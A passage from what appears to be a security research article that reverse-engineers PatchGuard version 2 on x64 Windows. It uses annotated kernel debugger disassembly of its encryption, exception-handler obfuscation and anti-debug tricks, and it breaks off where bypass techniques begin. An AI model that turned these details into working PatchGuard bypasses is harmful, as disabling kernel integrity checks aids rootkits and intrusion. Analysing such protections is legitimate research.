initial instruction to its executable, +; plaintext form. +; + +0: kd> u FFFFFADFF6E6D55D +; +; The `lock' prefix is used to create a four byte instruction when there +; is no immediate offset specified (a MASM limitation, as the assembler +; will convert a zero offset into the shorter form with no immediate +; offset operand). +; +fffffadf`f6e6d55d f0483111 lock xor qword ptr [rcx],rdx +fffffadf`f6e6d561 48315108 xor qword ptr [rcx+8],rdx +fffffadf`f6e6d565 48315110 xor qword ptr [rcx+10h],rdx +fffffadf`f6e6d569 48315118 xor qword ptr [rcx+18h],rdx +fffffadf`f6e6d56d 48315120 xor qword ptr [rcx+20h],rdx +fffffadf`f6e6d571 48315128 xor qword ptr [rcx+28h],rdx +fffffadf`f6e6d575 48315130 xor qword ptr [rcx+30h],rdx +fffffadf`f6e6d579 48315138 xor qword ptr [rcx+38h],rdx +0: kd> u +fffffadf`f6e6d57d 48315140 xor qword ptr [rcx+40h],rdx +fffffadf`f6e6d581 48315148 xor qword ptr [rcx+48h],rdx +; +; Because the initial instruction was re-encrypted after it was executed, +; we need to decrypt it again. +; +fffffadf`f6e6d585 3111 xor dword ptr [rcx],edx +fffffadf`f6e6d587 488bc2 mov rax,rdx +fffffadf`f6e6d58a 488bd1 mov rdx,rcx +fffffadf`f6e6d58d 8b4a4c mov ecx,dword ptr [rdx+4Ch] +; +; The following is the second stage decryption loop. It's purpose is to +; decrypt a code block following the current decryption stub in memory. +; +; This code block is then executed (it is responsible for performing the +; actual PatchGuard system verification checks). +; + +fffffadf`f6e6d590 483144ca48 xor qword ptr [rdx+rcx*8+48h],rax +fffffadf`f6e6d595 48d3c8 ror rax,cl +0: kd> u +fffffadf`f6e6d598 e2f6 loop fffffadf`f6e6d590 +; +; After decryption of the second block is completed, we'll execute it +; by jumping to it. Doing so kicks off the system verification routine +; that verifies system integrity, arranging for a bug check if not, +; otherwise arranging for itself to be executed again several minutes +; later. +; +fffffadf`f6e6d59a 8b8288010000 mov eax,dword ptr [rdx+188h] +fffffadf`f6e6d5a0 4803c2 add rax,rdx +fffffadf`f6e6d5a3 ffe0 jmp rax + +Prior to returning control, the verification routine re-encrypts itself so +that it does not remain in plaintext after the first invocation. In addition, +PatchGuard also re-randomizes the key used to encrypt and decrypt the +PatchGuard validation routine on each execution, such that a would-be attacker +has a frequently mutating target. Due to this behavior, the PatchGuard +validation routine changes appearance (in encrypted form) in-memory every few +minutes, which is the period of PatchGuard's validation checks. While this is +perhaps an admirable effort on Microsoft's part as far as interesting +obfuscation techniques go, it turns out that there are much easier avenues of +attack that can be used to disable PatchGuard without having to involve +oneself in the search of a target that alters its appearance in-memory every +few minutes. + +3.4) Obfuscation of System Integrity Check Calls via Structured Exception Handling + +Much like PatchGuard version 1, this version of PatchGuard utilizes structured +exception handling (SEH) support as an integral part of the process used to +kick off execution of the system integrity check routine. The means by which +this is accomplished have changed somewhat since the last PatchGuard version. +In particular, there are several layers of obfuscation in each PatchGuard DPC +that are used to shroud the actual call to the integrity check routine. In an +effort to make matters more difficult for would-be attackers, the exact +details of the obfuscation used vary between each of the ten DPCs that may be +repurposed for use with PatchGuard. They all exhibit a common pattern, +however, which can be described at a high level. + +The first step in invoking the PatchGuard system integrity checking routine is +a KTIMER with an associated KDPC (indicating a DPC callback routine to be +called when the timer lapses) associated with it. This timer is primed for +single-shot execution in an interval on the order of several minutes (with a +random fuzz factor delta applied to increase the difficulty of performing a +classic egghunt style attack to locate the KTIMER in non-paged pool). The DPC +routine indicated with the KDPC that is associated with PatchGuard's KTIMER is +one of the set of ten legitimate DPC routines that may be repurposed for use +with PatchGuard. The means by which this particular invocation of the DPC +routine is distinguished from a legitimate system invocation of the DPC +routine in question is by the use of a deliberately invalid kernel pointer as +one of the arguments to the DPC routine. + +The prototype for a DPC routine is described by PKDEFERRED_ROUTINE: + +typedef +VOID +(*PKDEFERRED_ROUTINE) ( + IN struct _KDPC *Dpc, // pointer to parent DPC + IN PVOID DeferredContext, // arbitrary context - assigned at DPC initialization + IN PVOID SystemArgument1, // arbitrary context - assigned when DPC is queued + IN PVOID SystemArgument2 // arbitrary context - assigned when DPC is queued + ); + +Essentially, a DPC is a callback routine with a set of user-defined context +parameters whose interpretation is entirely up to the DPC routine itself. The +standard use for context arguments in callback functions is to use them to +point to a larger structure which contains information necessary for the +callback routine to function, and this is exactly how the ten DPC routines +that can used by PatchGuard regard the DeferredContext argument during +legitimate execution. It is this usage of the DeferredContext argument which +allows PatchGuard to trigger its execution for each of the ten DPC routines +via an exception; PatchGuard arranges for a bogus DeferredContext value to be +passed to the DPC routine when it is called. The first time that the DPC +routine tries to dereference the DPC-specific structure referred to by +DeferredContext, an exception occurs (which transfers control to the exception +dispatching system, and eventually to PatchGuard's integrity check routine). +While this may seem simple at first, if the reader is familiar with kernel +mode programming, then there should be a couple of red flags set off by this +description; normally, it is not possible to catch bogus memory references at +DISPATCH_LEVEL or above with SEH (usually, one of the +PAGE_FAULT_IN_NON_PAGED_AREA or IRQL_NOT_LESS_OR_EQUAL bugchecks will be +raised, depending on whether the bogus reference was to a reserved non-paged +region or a paged-out pagable memory region). As a result, one would expect +that PatchGuard would be putting the system at risk of randomly bugchecking by +passing bogus pointers that are referenced at DISPATCH_LEVEL, the IRQL at +which DPC routines run. However, PatchGuard has a couple of tricks up its +metaphorical sleeve. It takes advantage of an implementation-specific detail +of the current generation of x64 processors shipped by AMD in order to form +kernel mode addresses that, while bogus, will not result in a page fault when +referenced. Instead, these bogus addresses will result in a general +protection fault, which eventually manifests itself as a +STATUS_ACCESS_VIOLATION SEH exception. This path to raising a +STATUS_ACCESS_VIOLATION exception does in fact work even at DISPATCHL_EVEL, +thus allowing PatchGuard to provide safe bogus pointer values for the +DeferredContext argument in order to trigger SEH dispatching without risking +bringing the system down with a bugcheck. + +Specifically, the implementation detail that PatchGuard relies upon relates to +the 48-bit address space limitation in AMD's Hammer family of processors[4]. +Current AMD processors only implement 48 bits of the 64-bit address space +presented by the x64 architecture. This is accomplished by requiring that +bits 63 through the most significant bit implemented by the processor (current +AMD processors implement 48 bits) of any given address be set to either all +ones or all zeros. An address of this form is defined to be a canonical +address, or a well-formed address. Attempts to reference addresses that are +not canonical as defined by this definition result in the processor +immediately raising a general protection fault. This restriction on the +address space essentially splits the usable address space into two halves; one +region at the high end of the address space, and one region at the low end of +the address space, with a no-mans-land in between the two. Windows utilizes +this split to divide user mode from kernel mode, with the high end of the +address space being reserved for kernel mode usage and the low end of the +address space being reserved for user mode usage. PatchGuard takes advantage +of this processor-mandated no-mans-land to create bogus pointer values that +can be safely dereferenced and caught by SEH, even at high IRQLs. + +All of the DPC routines that are in the set which may be repurposed for use by +PatchGuard dereference the DeferredContext argument as the first part of work +that does not involve shuffling stack variables around. In other words, the +first real work involved in any of the PatchGuard-enabled DPC routines is to +touch a structure or variable pointed to by the DeferredContext argument. In +the execution path of PatchGuard attempting to trigger a system integrity +check, the DeferredContext argument is invalid, which eventually results in +an access violation exception that is routed to the SEH registrations for the +DPC routine. If one examines any of the PatchGuard DPC routines, it is clear +that all of them have several overlapping SEH registrations (a construct that +normally indicates several levels of nested try/except and try/finally +constructs): + +1: kd> !fnseh nt!ExpTimeRefreshDpcRoutine +nt!ExpTimeRefreshDpcRoutine Lc8 0A,02 [EU ] nt!_C_specific_handler (C) +> fffff8000100358a La (fffff8000112c830 -> fffff80001000000) +> fffff8000100358a Lc (fffff8000112c870 -> fffff80001003596) +> fffff8000100358a L16 (fffff8000112c8a0 -> fffff80001000000) +> fffff8000100358a L18 (fffff8000112c8f0 -> fffff800010035a2) + +These SEH registrations are integral to the operation of PatchGuard's system +integrity checks. The specifics of how each handler registration work differ +for each DPC routine (in an attempt to frustrate attempts to reverse engineer +them), but the general idea is that each registered handler performs a portion +of the work necessary to set up a call to the PatchGuard integrity check +routine. This work is divided up among four different exception/unwind +handlers in an effort to make it difficult to understand what is going on, but +ultimately the end result is the same for each of the DPC routines; one of the +exception/unwind handlers ends up making a direct call to the system integrity +check decryption stub in-memory. The decryption stub decrypts itself, and +then decrypts the PatchGuard check routine, following with a transfer of +control to the integrity check routine so that PatchGuard can inspect various +protected registers, MSRs, and kernel images (such as the kernel itself) for +unauthorized modification. + +Additionally, all of the PatchGuard DPCs have been enhanced to obfuscate the +DPC routine arguments in stack variables (whose exact stack displacement +varies from DPC routine to DPC routine, and furthermore between kernel flavor +to kernel flavor; for example, the multiprocessor and uniprocessor kernel +builds have different stack frame layouts for many of the PatchGuard DPC +routines). Recall that in the x64 calling convention, the first four +arguments are passed via registers (rcx, rdx, r8, and r9 respectively). Each +PatchGuard DPC routine takes special care to save away significant register +arguments onto the stack (in an obfuscated form). Several of the arguments +remain obfuscated until just before the decryption stub for the system +integrity check routine is called, in an effort to make it difficult for third +parties to patch into the middle of a particular DPC routine and easily access +the original arguments to the DPC. This is presumably designed in an attempt +to make it more difficult to differentiate DPC invocations that perform the +DPC routine's legitimate function from DPC invocations that will call +PatchGuard. It also makes it difficult, though not impossible, for a third +party to recover the original arguments to the DPC routine from the context of +any of the exception handlers registered to the DPC routine in a generalized +fashion. + +This obfuscation of arguments can be clearly seen by disassembling any of the +PatchGuard DPC routines. For example, when looking at +ExpTimeRefreshDpcRoutine, one can see that the routine saves away the Dpc +(rcx) and DeferredContext (rdx) arguments on the stack, rotates them by a +magical constant (this constant differs for each DPC routine flavor and is +used to further complicate the task of recovering the original DPC arguments +in a generalized fashion), and then overwrites the original argument +registers: + +0: kd> uf nt!ExpTimeRefreshDpcRoutine +; +; On entry, we have the following: +; +; rcx -> Dpc +; rdx -> DeferredContext (if this is being called for +; PatchGuard, then DeferredContext +; is a bogus kernel pointer). +; r8 -> SystemArgument1 +; r9 -> SystemArgument2 +; +nt!ExpTimeRefreshDpcRoutine: +; +; r11 is used as an ephemeral frame pointer here. +; +; Ephemeral frame pointers are an x64-specific compiler +; construct, wherein a volatile register is used as a +; frame pointer until the first function call is made. +; +fffff800`01003540 4c8bdc mov r11,rsp +fffff800`01003543 4881ecc8000000 sub rsp,0C8h +fffff800`0100354a 4889642460 mov qword ptr [rsp+60h],rsp +; +; This DPC routine does not use SystemArgument1 or +; SystemArgument2. As a result, it is free to overwrite +; these argument registers immediately without preserving +; their value. +; +; r8 = Dpc +; rcx = Dpc +; rdx = DeferredContext +; +fffff800`0100354f 4c8bc1 mov r8,rcx +fffff800`01003552 4889542448 mov qword ptr [rsp+48h],rdx +; +; Set [rsp+20h] to zero. This is a state variable that is +; used by the exception/unwind scope handlers in order to +; coordinate the PatchGuard execution process across the +; set of four exception/unwind scope handlers associated +; with this section of code. +; +fffff800`01003557 4533c9 xor r9d,r9d +fffff800`0100355a 44894c2420 mov dword ptr [rsp+20h],r9d +; +; PatchGuard zeros out various key fields in the DPC. +; This is an attempt to make it difficult to locate the DPC +; in-memory from the context of an exception handler called +; when a PatchGuard DPC accesses the bogus DeferredContext +; argument. Specifically, PatchGuard zeros the Type and +; DeferredContext fields of the KDPC structure, shown below: +; +; 0: kd> dt nt!_KDPC +; +0x000 Type : UChar +; +0x001 Importance : UChar +; +0x002 Number : UChar +; +0x003 Expedite : UChar +; +0x008 DpcListEntry : _LIST_ENTRY +; +0x018 DeferredRoutine : Ptr64 +; +0x020 DeferredContext : Ptr64 Void +; +0x028 SystemArgument1 : Ptr64 Void +; +0x030 SystemArgument2 : Ptr64 Void +; +0x038 DpcData : Ptr64 Void +; +; Dpc->Type = 0 +; +fffff800`0100355f 448809 mov byte ptr [rcx],r9b +; +; Dpc->DeferredContext = 0 +; +fffff800`01003562 4c894920 mov qword ptr [rcx+20h],r9 +; +; Here, the DPC loads [r11-20h] with an obfuscated +; copy of the DeferredContext argument (rotated +; left by 0x34 bits). +; +; Recall that rsp == r11+0xc8, so this location +; can also be aliased by [rsp+0A8h]. +; +; [rsp+0A8h] -> ROL(DeferredContext, 0x34) +; +fffff800`01003566 488bc2 mov rax,rdx +fffff800`01003569 48c1c034 rol rax,34h +fffff800`0100356d 498943e0 mov qword ptr [r11-20h],rax +; +; Similarly, the DPC loads [r11-48h] with an +; obfuscated copy of the Dpc argument (rotated +; right by 0x48 bits). +; +; This location may be aliased as [rsp+80h]. +; +; [rsp+80h] -> ROR(Dpc, 0x48) +; +fffff800`01003571 488bc1 mov rax,rcx +fffff800`01003574 48c1c848 ror rax,48h +fffff800`01003578 498943b8 mov qword ptr [r11-48h],rax +; +; The following register context is now in place: +; +; r8 = Dpc +; rcx = Dpc +; rdx = DeferredContext +; rax = ROR(Dpc, 0x48) +; [rsp+0A8h] = ROL(DeferredContext, 0x34) +; [rsp+80h] = ROR(Dpc, 0x48) +; +; The DPC routine destroys the contents of rcx by +; zero extending it with a copy of the low byte of +; the DeferredContext value. +; +fffff800`0100357c 0fb6ca movzx ecx,dl +; +; The DPC routine destroys the contents of r8 with +; a right shift (unlike a rotate, the incoming left +; bits are simply zero filled instead of set to the +; rightmost bits being shifted off. The rightmost +; bits are thus lost forever, destroying the r8 +; register as a useful source of the Dpc argument. +; +fffff800`0100357f 49d3e8 shr r8,cl +; +; r8 is saved away on the stack, but it is no longer +; directly useful as a way to locate the Dpc argument +; due to the destructive right shift above. +; +fffff800`01003582 4c898424d8000000 mov qword ptr [rsp+0D8h],r8 +; +; r8 = Dpc >> (UCHAR)DeferredContext +; rcx = (UCHAR)DeferredContext +; rdx = DeferredContext +; rax = ROR(Dpc, 0x48) +; [rsp+0A8h] = ROL(DeferredContext, 0x34) +; [rsp+80h] = ROR(Dpc, 0x48) +; +; Here, we temporarily deobfuscate the DeferredContext +; argument stored at [r11-20h] above. In this particular +; instance, rdx also happens to contain the deobfuscated +; DeferredContext value, but not all instances of +; PatchGuard's DPC routines share this property of +; retaining a plaintext copy of DeferredContext in rdx. +; +fffff800`0100358a 498b43e0 mov rax,qword ptr [r11-20h] +fffff800`0100358e 48c1c834 ror rax,34h +; +; Now, we have the following context in place: +; +; r8 = Dpc >> (UCHAR)DeferredContext +; rcx = (UCHAR)DeferredContext +; rdx = DeferredContext (* But not valid for +; all DPC routines.) +; rax = DeferredContext +; [rsp+0A8h] = ROL(DeferredContext, 0x34) +; [rsp+80h] = ROR(Dpc, 0x48) +; +; The next step is to dereference the DeferredContext value. +; For a legitimate DPC invocation, this operation is harmless; +; the DeferredContext value would point to valid kernel memory. +; +; For PatchGuard, however, this triggers an access violation +; that winds up with control being transferred to the exception +; handlers registered to the DPC routine. +; +fffff800`01003592 8b00 mov eax,dword ptr [rax] + +At this point, it is necessary to investigate the various exception/unwind +handlers registered to the DPC routine in order to determine what happens +next. Most of these handlers can be skipped as they are nothing more than +minor layers of obfuscation that, while differing significantly between each +DPC routine, have the same end result. One of the exception/unwind handlers, +however, makes the call to PatchGuard's integrity check, and this handler is +worthy of further discussion. Because the exception registrations for all of +the PatchGuard DPC routines make use of nt!_C_specific_handler, the scope +handlers conform to a standard prototype, defined below: + +// +// Define the standard type used to describe a C-language exception handler, +// which is used with _C_specific_handler. +// +// The actual parameter values differ depending on whether the low byte of the +// first argument contains the value 0x1. If this is the case, then the call +// is to the unwind handler to the routine; otherwise, the call is to the +// exception handler for the routine. Each routine has fairly different +// interpretations for the two arguments, though the prototypes are as far as +// calling conventions go compatible. +// + +typedef +LONG +(NTAPI * PC_LANGUAGE_EXCEPTION_HANDLER)( + __in PEXCEPTION_POINTERS ExceptionPointers, // if low byte is 0x1, then we're an unwind + __in ULONG64 EstablisherFrame // faulting routine stack pointer + ); + +In the case of nt!ExpTimeRefreshDpcRoutine, the fourth scope handler +registration is the one that performs the call to PatchGuard's integrity check +routine. Here, the routine only executes the integrity check if a state +variable stored at [rsp+20h] in the DPC routine is set to a particular value. +This state variable is modified as the access violation exception traverses +each of the exception/unwind scope handlers until it reaches this handler, +which eventually leads up to the execution of PatchGuard's system integrity +check. For now, it is best to assume that this routine is being called with +[rsp+20h] in the DPC routine having been set to a value other than 0x15. This +signifies that PatchGuard should be executed. + +0: kd> uf fffff8000112c8f0 +nt!ExpTimeRefreshDpcRoutine+0x17f: +; +; mov eax, eax is a hotpatch stub and can be ignored. +; +fffff800`0112c8f0 8bc0 mov eax,eax +fffff800`0112c8f2 55 push rbp +fffff800`0112c8f3 4883ec20 sub rsp,20h +; +; rdx corresponds to the EstablisherFrame argument. +; This argument is the stack pointer (rsp) value for +; the routine that this exception/unwind handler is +; associated with. The typical use of this argument +; is to allow seamless access to local variables in +; the routine for which the try/except filter is +; associated with. This is what eventually ends up +; occuring here, with the rbp register being loaded +; with the stack pointer of the DPC routine at the +; point in time where the exception occured. +; +; +fffff800`0112c8f7 488bea mov rbp,rdx +; +; We make the check against the state variable. +; Recall that when the DPC routine was first entered, +; [rsp+20h] in the DPC routine's context was set to +; zero. That location corresponds to [rbp+20h] in +; this context, as rbp has been loaded with the stack +; pointer that was in use in the DPC routine. This +; location is checked and altered by each of the +; registered exception/unwind handlers, and will +; eventually be set to 0x15 when this routine is called. +; +fffff800`0112c8fa 83452007 add dword ptr [rbp+20h],7 +fffff800`0112c8fe 8b4520 mov eax,dword ptr [rbp+20h] +fffff800`0112c901 83f81c cmp eax,1Ch +; +; For the moment, consider the case where this jump is +; not taken. The jump is taken when PatchGuard is not +; being executed (which is not the interesting case). +; +fffff800`0112c904 0f858c000000 jne nt!ExpTimeRefreshDpcRoutine+0x215 (fffff800`0112c996) + +nt!ExpTimeRefreshDpcRoutine+0x189: +; +; To understand the following instructions, it is +; necessary to look back at the stack variable context +; that was set up by the DPC routine prior to the +; faulting instruction that caused the access +; violation exception. The following values were +; set on the stack at that time: +; +; [rsp+0A8h] = ROL(DeferredContext, 0x34) +; [rsp+80h] = ROR(Dpc, 0x48) +; +; The following set of instructions utilize these +; obfuscated copies of the original arguments to the +; DPC routine in order to make the call to PatchGuard's +; integrity check routine. +; +; The first step taken is to deobfuscate the Dpc value +; that was stored at [rsp+80h], or [rbp+80h] as seen from +; this context. +; +fffff800`0112c90a 488b8580000000 mov rax,qword ptr [rbp+80h] +; +; rax = Dpc +; +fffff800`0112c911 48c1c048 rol rax,48h +; +; [rbp+50h] -> Dpc +; +fffff800`0112c915 48894550 mov qword ptr [rbp+50h],rax +; +; Next, the DeferredContext argument is deobfuscated and +; stored plaintext. +; +fffff800`0112c919 488b85a8000000 mov rax,qword ptr [rbp+0A8h] +; +; rax = DeferredContext +; +fffff800`0112c920 48c1c834 ror rax,34h +; +; [rbp+58h] -> DeferredContext +; +fffff800`0112c924 48894558 mov qword ptr [rbp+58h],rax +; +; rax = Dpc +; +fffff800`0112c928 488b4550 mov rax,qword ptr [rbp+50h] +; +; The next instruction accesses memory after the KDPC +; object in memory. Recall that a KDPC object is 0x40 +; bytes in length on x64, so [Dpc+40h] is the first +; value beyond the DPC in memory. In reality, the KDPC +; is a member of a larger structure, which is defined +; as follows: +; +; struct PATCHGUARD_DPC_CONTEXT { +; KDPC Dpc; // +0x00 +; ULONGLONG DecryptionKey; // +0x40 +; }; +; +; As a result, this instruction is equivalent to casting +; the Dpc argument to a PATCHGUARD_DPC_CONTEXT*, and then +; accessing the DecryptionKey member +; +; +; rcx = Dpc->DecryptionKey +; +fffff800`0112c92c 488b4840 mov rcx,qword ptr [rax+40h] +; +; [rbp+40h] -> DecryptionKey +; +fffff800`0112c930 48894d40 mov qword ptr [rbp+40h],rcx +; +; rax = DecryptionKey +; +fffff800`0112c934 488b4540 mov rax,qword ptr [rbp+40h] +; +; The DeferredContext value is then xor'd with the +; decryption key stored in the PATCHGUARD_DPC_CONTEXT +; structure. This yields the significant bits of the +; pointer to the PatchGuard decryption stub. Recall +; that due to the "no-mans-land" region in between the +; kernel mode and user mode address space boundaries +; on current AMD64 processors, the rest of the bits +; are required to be either all ones or all zeros in +; order to form a valid address. Because we are +; dealing with a kernel mode address, it can be safely +; assumed that all of the bits must be ones. +; +fffff800`0112c938 48334558 xor rax,qword ptr [rbp+58h] +; +; [rbp+30h] -> DeferredContext ^ DecryptionKey +; +fffff800`0112c93c 48894530 mov qword ptr [rbp+30h],rax +; +; Set the required bits to ones in the decrypted +; pointer, as required to form a canonical address on +; current AMD64 systems. +; +fffff800`0112c940 48b80000000000f8ffff mov rax,0FFFFF80000000000h +; +; [rbp+30h] -> [rbp+30h] | 0xFFFFF80000000000 +; +; Now, [rbp+30h] is the pointer to the decryption stub. +; +fffff800`0112c94a 48094530 or qword ptr [rbp+30h],rax +; +; The following instructions make extra copies of the decryption +; stub on the stack of the DPC routine. There is no real purpose +; to this, other than a half-hearted attempt to confuse anyone +; attempting to reverse engineer this section of PatchGuard. +; +; [rbp+38h] -> [rbp+30h] (Decryption stub) +; +fffff800`0112c94e 488b4530 mov rax,qword ptr [rbp+30h] +fffff800`0112c952 48894538 mov qword ptr [rbp+38h],rax +; +; [rbp+28h] -> [rbp+38h] (Decryption stub) +; +fffff800`0112c956 488b4538 mov rax,qword ptr [rbp+38h] +fffff800`0112c95a 48894528 mov qword ptr [rbp+28h],rax +; +; The next set of instructions rewrite the first +; four bytes of the initial opcode in the decryption +; stub. This opcode must be set to the following +; instruction: +; +; f0483111 lock xor qword ptr [rcx],rdx +; +; The individual opcode bytes for the instruction are +; written to the decryption stub one byte at a time. +; +; *(PULONG)DecryptionStub = 0x113148f0 +; +fffff800`0112c95e 488b4528 mov rax,qword ptr [rbp+28h] +fffff800`0112c962 c600f0 mov byte ptr [rax],0F0h +fffff800`0112c965 488b4528 mov rax,qword ptr [rbp+28h] +fffff800`0112c969 c6400148 mov byte ptr [rax+1],48h +fffff800`0112c96d 488b4528 mov rax,qword ptr [rbp+28h] +fffff800`0112c971 c6400231 mov byte ptr [rax+2],31h +fffff800`0112c975 488b4528 mov rax,qword ptr [rbp+28h] +fffff800`0112c979 c6400311 mov byte ptr [rax+3],11h +; +; Finally, a call to the decryption stub is made. The +; decryption stub has a prototype that conforms to the +; following definition: +; +; VOID +; NTAPI +; PgDecryptionStub( +; __in PVOID PatchGuardRoutine, +; __in ULONG64 DecryptionKey, +; __in ULONG Reserved0, +; __in ULONG Reserved1 +; ); +; +; The two 'reserved' ULONG values are always set to zero. +; +; rcx is loaded with the address of the decryption stub, +; and rdx is loaded with the DecryptionKey value. +; +fffff800`0112c97d 4533c9 xor r9d,r9d +fffff800`0112c980 4533c0 xor r8d,r8d +fffff800`0112c983 488b5540 mov rdx,qword ptr [rbp+40h] +fffff800`0112c987 488b4d38 mov rcx,qword ptr [rbp+38h] +; +; At this point, control is transferred to the decryption +; stub, as described previously. The decryption stub will +; decrypt itself, decrypt the PatchGuard integrity check +; routine, and then transfer control to the PatchGuard +; integrity check routine. The integrity check routine is +; responsible for ensuring that the DPC is returned to a +; usable state (recall that parts of it were zeroed out +; by the DPC routine earlier), and that it is re-queued +; for execution. It is also responsible for re-encrypting +; the decryption stub as desired. +; +fffff800`0112c98b ff5538 call qword ptr [rbp+38h] +; +; After the call is made, the exception filter returns +; the EXCEPTION_EXECUTE_HANDLER manifest constant. This +; causes one of the registered handlers to be invoked +; in order to handle the exception. The handler will +; transfer control to the return point of the DPC routine, +; thus skipping the body of the DPC (since the call to +; the DPC was not a request for the legitimate function of +; the DPC to be performed). +; +fffff800`0112c98e 41b901000000 mov r9d,1 +fffff800`0112c994 eb03 jmp nt!ExpTimeRefreshDpcRoutine+0x218 (fffff800`0112c999) + +nt!ExpTimeRefreshDpcRoutine+0x215: +fffff800`0112c996 4533c9 xor r9d,r9d + +nt!ExpTimeRefreshDpcRoutine+0x218: +fffff800`0112c999 418bc1 mov eax,r9d +fffff800`0112c99c 4883c420 add rsp,20h +fffff800`0112c9a0 5d pop rbp +fffff800`0112c9a1 c3 ret + +This does represent a significant level of obfuscation, but it is not +impenetrable, and there are various simple ways through which an attacker +could bypass all of these layers of obfuscation entirely. + +3.5) Disruption of Debug Register-Based Breakpoints + +PatchGuard version 2 attempts to protect itself from breakpoints that are set +using the hardware debug registers. These breakpoints operate by setting up +to four designated memory locations that are of interest. Each memory +location can be configured to cause a debug exception when it is read, +written, or executed. Because breakpoints of this flavor are not visible to +PatchGuard's code integrity checks (unlike conventional breakpoints, these +breakpoints do not involve int 3 (0xcc) opcodes being substituted for target +instructions), debug register-based breakpoints (sometimes known as ``memory +breakpoints'' or ``hardware breakpoints'') pose a threat to PatchGuard. +PatchGuard attempts to counter this threat by disabling all such debug +register-based breakpoints as a first step after the system integrity checking +routine has been decrypted in-memory: + +; +; Here, the second stage decryption sequence is +; set to run to decrypt the system integrity +; check routine. We step over the second stage +; decryption and examine the integrity check +; routine in its plaintext state... +; + +fffffadf`f6edc043 8b4a4c mov ecx,dword ptr [rdx+4Ch] +fffffadf`f6edc046 483144ca48 xor qword ptr [rdx+rcx*8+48h],rax +fffffadf`f6edc04b 48d3c8 ror rax,cl +fffffadf`f6edc04e e2f6 loop fffffadf`f6edc046 +fffffadf`f6edc050 8b8288010000 mov eax,dword ptr [rdx+188h] +fffffadf`f6edc056 4803c2 add rax,rdx +fffffadf`f6edc059 ffe0 jmp rax +fffffadf`f6edc05b 90 nop +; +; We set a breakpoint on the 'jmp rax' instruction +; above. This instruction is what transfers control +; to the system integrity check routine. +; +0: kd> ba e1 fffffadf`f6edc059 +0: kd> g +Breakpoint 2 hit +fffffadf`f6edc059 ffe0 jmp rax +; +; rax now points to the decrypted system +; integrity check routine in-memory. The +; first call it makes is to a routine whose +; purpose is to disable all debug register-based +; breakpoints by clearing the debug control +; register (dr7). Doing so effectively turns +; off all of the debug register breakpoints. +; +0: kd> u @rax +fffffadf`f6edd8de 4883ec78 sub rsp,78h +fffffadf`f6edd8e2 48895c2470 mov qword ptr [rsp+70h],rbx +fffffadf`f6edd8e7 48896c2468 mov qword ptr [rsp+68h],rbp +fffffadf`f6edd8ec 4889742460 mov qword ptr [rsp+60h],rsi +fffffadf`f6edd8f1 48897c2458 mov qword ptr [rsp+58h],rdi +fffffadf`f6edd8f6 4c89642450 mov qword ptr [rsp+50h],r12 +fffffadf`f6edd8fb 488bda mov rbx,rdx +fffffadf`f6edd8fe 4c896c2448 mov qword ptr [rsp+48h],r13 +0: kd> u +fffffadf`f6edd903 e8863a0000 call fffffadf`f6ee138e +; +; The routine simply writes all zeros to dr7. +; +0: kd> u fffffadf`f6ee138e +fffffadf`f6ee138e 33c0 xor eax,eax +fffffadf`f6ee1390 0f23f8 mov dr7,rax +fffffadf`f6ee1393 c3 ret + +3.6) Misleading Symbol Names + +One of the things that Microsoft needed to consider when implementing +PatchGuard is that would-be attackers would have access to the operating +system symbols. As a debugging aid, Microsoft makes symbols for the entire +operating system publicly available. It is not feasible to remove the +operating system symbols from public access (doing so would severely hinder +ISVs in the process of debugging their own drivers). As a result, Microsoft +took the route of using misleading function names to shroud PatchGuard +routines from casual inspection. Many of the internal PatchGuard routines +have names that are seemingly legitimate-sounding at first glance, such that +without a detailed knowledge of the kernel or actually inspecting these +routines, it would be difficult to simply look at a list of all symbols in the +kernel and locate the routines responsible for setting up PatchGuard. + +The following is a listing of some of the misleading symbols that are used +during PatchGuard initialization: + + 1. RtlpDeleteFunctionTable + 2. FsRtlMdlReadCompleteDevEx + 3. RtlLookupFunctionEntryEx + 4. SdbpCheckDll + 5. FsRtlUninitializeSmallMcb + 6. KiNoDebugRoutine + 7. SepAdtInitializePrivilegeAuditing + 8. KiFilterFiberContext + +3.7) Integrity Checks Performed During System Initialization + +During system initialization, PatchGuard performs integrity checks on several +of the anti-debug mechanisms it has in place. If these mechanisms are altered +on-disk, PatchGuard will detect the changes. For example, PatchGuard +validates that the routine responsible for clearing debug register-based +breakpoints contains the correct opcode bytes corresponding to the +instructions used to actually zero out Dr7: + +; +; Here, we are in SepAdtInitializePrivilegeAuditing, or the +; initialization routine for PatchGuard during system startup. +; +; This code fragment is designed to validate that the +; KiNoDebugRoutine routine contains the expected opcodes that +; are used to zero out debug register breakpoints. If the +; routine does not contain the correct opcodes, PatchGuard +; makes an early exit from SepAdtInitializePrivilegeAuditing. +; +INIT:0000000000832A6D lea rax, KiNoDebugRoutine +INIT:0000000000832A74 cmp dword ptr [rax], 230FC033h +INIT:0000000000832A7A jnz abort_initialization +INIT:0000000000832A80 add rax, 4 +INIT:0000000000832A84 cmp word ptr [rax], 0C3F8h +INIT:0000000000832A89 jnz abort_initialization + +3.8) Overwriting PatchGuard Initialization Code Post-Boot + +After PatchGuard has initialized itself, it intentionally zeros out much of +the code responsible for setting up PatchGuard. It is assumed that this is +done in an attempt to prevent third party drivers from analyzing kernel code +in-memory in order to detect or defeat PatchGuard. This approach is obviously +trivially bypassed by opening the kernel image on disk, however. + +After boot, many PatchGuard-related routines contain all zeros: + +0: kd> u nt!KiNoDebugRoutine +nt!KiNoDebugRoutine: +fffff800`011a4b20 0000 add byte ptr [rax],al + +nt!FsRtlUninitializeSmallMcb: +fffff800`011a4aa2 0000 add byte ptr [rax],al + +0: kd> u nt!KiGetGdtIdt +nt!KiGetGdtIdt: +fffff800`011a4a20 0000 add byte ptr [rax],al + +0: kd> u nt!RtlpDeleteFunctionTable +nt!RtlpDeleteFunctionTable: +fffff800`011a1010 0000 add byte ptr [rax],al + +Most of the PatchGuard initialization code resides in the INITKDBG section of +ntoskrnl. Portions of this section are zeroed out during initialization. + +4) Bypass Techniques + +Despite the myriad anti-reverse-engineering and anti-debug techniques employed +by PatchGuard version 2, it is hardly invincible to being bypassed by third +party code. Contrary to one might expect, given the descriptions in the +initial section of this article, there are a number of holes in PatchGuard's +armor that can be exploited by third party software. Several potential +techniques for bypassing PatchGuard version 2 are outlined below, including +one technique that includes functional proof of concept code. These +techniques are applicable to the version of PatchGuard currently shipping with +Windows XP x64 Edition with all hotfixes, Windows Server 2003 x64 Edition with +all hotfixes, and Windows Vista x64 with all hotfixes at the time that this +article was written. The author has only written a complete implementation of +the first proposed bypass technique, although the remaining proposed bypass +approaches 